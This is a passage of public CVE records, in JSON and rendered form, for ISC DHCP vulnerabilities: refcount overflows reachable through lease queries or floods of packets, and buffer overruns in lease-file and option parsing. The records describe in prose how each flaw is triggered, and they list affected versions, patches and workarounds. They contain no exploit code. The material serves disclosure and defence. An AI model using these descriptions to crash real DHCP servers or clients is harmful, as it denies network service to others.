          "value": "In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option\u0027s refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "We are not aware of any active exploits."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option\u0027s refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "url": "https://kb.isc.org/docs/cve-2022-2928"
        },
        {
          "name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
        },
        {
          "name": "FEDORA-2022-f5a45757df",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
        },
        {
          "name": "FEDORA-2022-9ca9a94e28",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
        },
        {
          "name": "FEDORA-2022-c4f274a54f",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
        },
        {
          "name": "GLSA-202305-22",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://security.gentoo.org/glsa/202305-22"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads.  4.4.3-P1 4.1-ESV-R16-P2"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "An option refcount overflow exists in dhcpd",
      "workarounds": [
        {
          "lang": "en",
          "value": "Disable lease query on the server for DHCPv4 or restart the server periodically."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2022-2928",
    "datePublished": "2022-10-07T04:45:11.751Z",
    "dateReserved": "2022-08-22T00:00:00.000Z",
    "dateUpdated": "2024-09-17T00:21:40.167Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-25217 (GCVE-0-2021-25217)

Vulnerability from cvelistv5 – Published: 2021-05-26 22:10 – Updated: 2024-09-16 22:08
Title
A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient
Summary
In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to:
  • the component being affected (i.e., dhclient or dhcpd)
  • whether the package was built as a 32-bit or 64-bit binary
  • whether the compiler flag -fstack-protection-strong was used when compiling
In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process.
In dhcpd, when run in DHCPv4 or DHCPv6 mode:
  • if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted.
  • if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted.
CWE
  • Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled. Because of a discrepancy between the code which handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where: dhcpd, while running in DHCPv4 or DHCPv6 mode, or dhclient, the ISC DHCP client implementation will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code. Affects ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability. Affects both dhcpd (server) and dhcpcd (client).
Assigner
isc
Impacted products
Vendor: ISC
Product: ISC DHCP
Version:
  • Affected: 4.1 ESV , < 4.1-ESV-R16-P1 (custom)
  • Affected: 4.4 , < 4.4.2-P1 (custom)
Date Public
2021-05-26 00:00
Credits
ISC would like to thank Jon Franklin from Dell and Pawel Wieczorkiewicz from Amazon Web Services for (independently) reporting this vulnerability.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:11.067Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/cve-2021-25217"
          },
          {
            "name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
          },
          {
            "name": "FEDORA-2021-08cdb4dc34",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
          },
          {
            "name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
          },
          {
            "name": "FEDORA-2021-8ca8263bde",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
          },
          {
            "name": "GLSA-202305-22",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/202305-22"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "lessThan": "4.1-ESV-R16-P1",
              "status": "affected",
              "version": "4.1 ESV",
              "versionType": "custom"
            },
            {
              "lessThan": "4.4.2-P1",
              "status": "affected",
              "version": "4.4",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank Jon Franklin from Dell and Pawel Wieczorkiewicz from Amazon Web Services for (independently) reporting this vulnerability."
        }
      ],
      "datePublic": "2021-05-26T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "We are not aware of any active exploits."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled.  Because of a discrepancy between the code which handles encapsulated option information in leases transmitted \"on the wire\" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where:      dhcpd, while running in DHCPv4 or DHCPv6 mode, or     dhclient, the ISC DHCP client implementation  will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code.  Affects ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability.  Affects both dhcpd (server) and dhcpcd (client).",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "url": "https://kb.isc.org/docs/cve-2021-25217"
        },
        {
          "name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
          "tags": [
            "mailing-list"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
        },
        {
          "name": "FEDORA-2021-08cdb4dc34",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
        },
        {
          "name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
        },
        {
          "name": "FEDORA-2021-8ca8263bde",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
        },
        {
          "name": "GLSA-202305-22",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://security.gentoo.org/glsa/202305-22"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of ISC DHCP:\n\n    ISC DHCP 4.1-ESV-R16-P1\n    ISC DHCP 4.4.2-P1"
        }
      ],
      "source": {
        "discovery": "USER"
      },
      "title": "A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient",
      "workarounds": [
        {
          "lang": "en",
          "value": "None known."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2021-25217",
    "datePublished": "2021-05-26T22:10:11.312Z",
    "dateReserved": "2021-01-15T00:00:00.000Z",
    "dateUpdated": "2024-09-16T22:08:32.175Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-5732 (GCVE-0-2018-5732)

Vulnerability from cvelistv5 – Published: 2019-10-09 14:17 – Updated: 2024-09-16 18:19
Title
A specially constructed response from a malicious server can cause a buffer overflow in dhclient
Summary
Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
CWE
  • Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.
Assigner
isc
References
https://kb.isc.org/docs/aa-01565 x_refsource_CONFIRM
Impacted products
Vendor | Product | Version
ISC | ISC DHCP | Affected: ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
Date Public
2018-02-28 00:00
Credits
ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T05:40:51.169Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/aa-01565"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
        }
      ],
      "datePublic": "2018-02-28T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-09T14:17:14.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/docs/aa-01565"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e=   DHCP 4.1-ESV-R15-P1\n \u003e=   DHCP 4.3.6-P1\n \u003e=   DHCP 4.4.1"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-officer@isc.org",
          "DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
          "ID": "CVE-2018-5732",
          "STATE": "PUBLIC",
          "TITLE": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ISC DHCP",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "ISC DHCP",
                            "version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ISC"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/docs/aa-01565",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/docs/aa-01565"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e=   DHCP 4.1-ESV-R15-P1\n \u003e=   DHCP 4.3.6-P1\n \u003e=   DHCP 4.4.1"
          }
        ],
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2018-5732",
    "datePublished": "2019-10-09T14:17:14.251Z",
    "dateReserved": "2018-01-17T00:00:00.000Z",
    "dateUpdated": "2024-09-16T18:19:36.136Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-5733 (GCVE-0-2018-5733)

Vulnerability from cvelistv5 – Published: 2019-01-16 20:00 – Updated: 2025-04-25 23:02
Title
A malicious client can overflow a reference counter in ISC dhcpd
Summary
A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0.
CWE
  • Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.
Assigner
isc
References
https://kb.isc.org/docs/aa-01567 x_refsource_CONFIRM
https://access.redhat.com/errata/RHSA-2018:0469 vendor-advisory, x_refsource_REDHAT
https://www.debian.org/security/2018/dsa-4133 vendor-advisory, x_refsource_DEBIAN
https://usn.ubuntu.com/3586-2/ vendor-advisory, x_refsource_UBUNTU
https://access.redhat.com/errata/RHSA-2018:0483 vendor-advisory, x_refsource_REDHAT
https://usn.ubuntu.com/3586-1/ vendor-advisory, x_refsource_UBUNTU
http://www.securityfocus.com/bid/103188 vdb-entry, x_refsource_BID
http://www.securitytracker.com/id/1040437 vdb-entry, x_refsource_SECTRACK
https://lists.debian.org/debian-lts-announce/2018… mailing-list, x_refsource_MLIST
Impacted products
Vendor | Product | Version
ISC | ISC DHCP | Affected: ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
Date Public
2018-02-28 00:00
Credits
ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability.

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-04-25T23:02:52.084Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/aa-01567"
          },
          {
            "name": "RHSA-2018:0469",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:0469"
          },
          {
            "name": "DSA-4133",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4133"
          },
          {
            "name": "USN-3586-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-2/"
          },
          {
            "name": "RHSA-2018:0483",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:0483"
          },
          {
            "name": "USN-3586-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-1/"
          },
          {
            "name": "103188",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/103188"
          },
          {
            "name": "1040437",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040437"
          },
          {
            "name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20250425-0010/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
        }
      ],
      "datePublic": "2018-02-28T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-01-17T10:57:01.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/docs/aa-01567"
        },
        {
          "name": "RHSA-2018:0469",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:0469"
        },
        {
          "name": "DSA-4133",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4133"
        },
        {
          "name": "USN-3586-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-2/"
        },
        {
          "name": "RHSA-2018:0483",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:0483"
        },
        {
          "name": "USN-3586-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-1/"
        },
        {
          "name": "103188",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/103188"
        },
        {
          "name": "1040437",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040437"
        },
        {
          "name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n    DHCP 4.1-ESV-R15-P1\n    DHCP 4.3.6-P1\n    DHCP 4.4.1"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "A malicious client can overflow a reference counter in ISC dhcpd",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-officer@isc.org",
          "DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
          "ID": "CVE-2018-5733",
          "STATE": "PUBLIC",
          "TITLE": "A malicious client can overflow a reference counter in ISC dhcpd"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ISC DHCP",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "ISC DHCP",
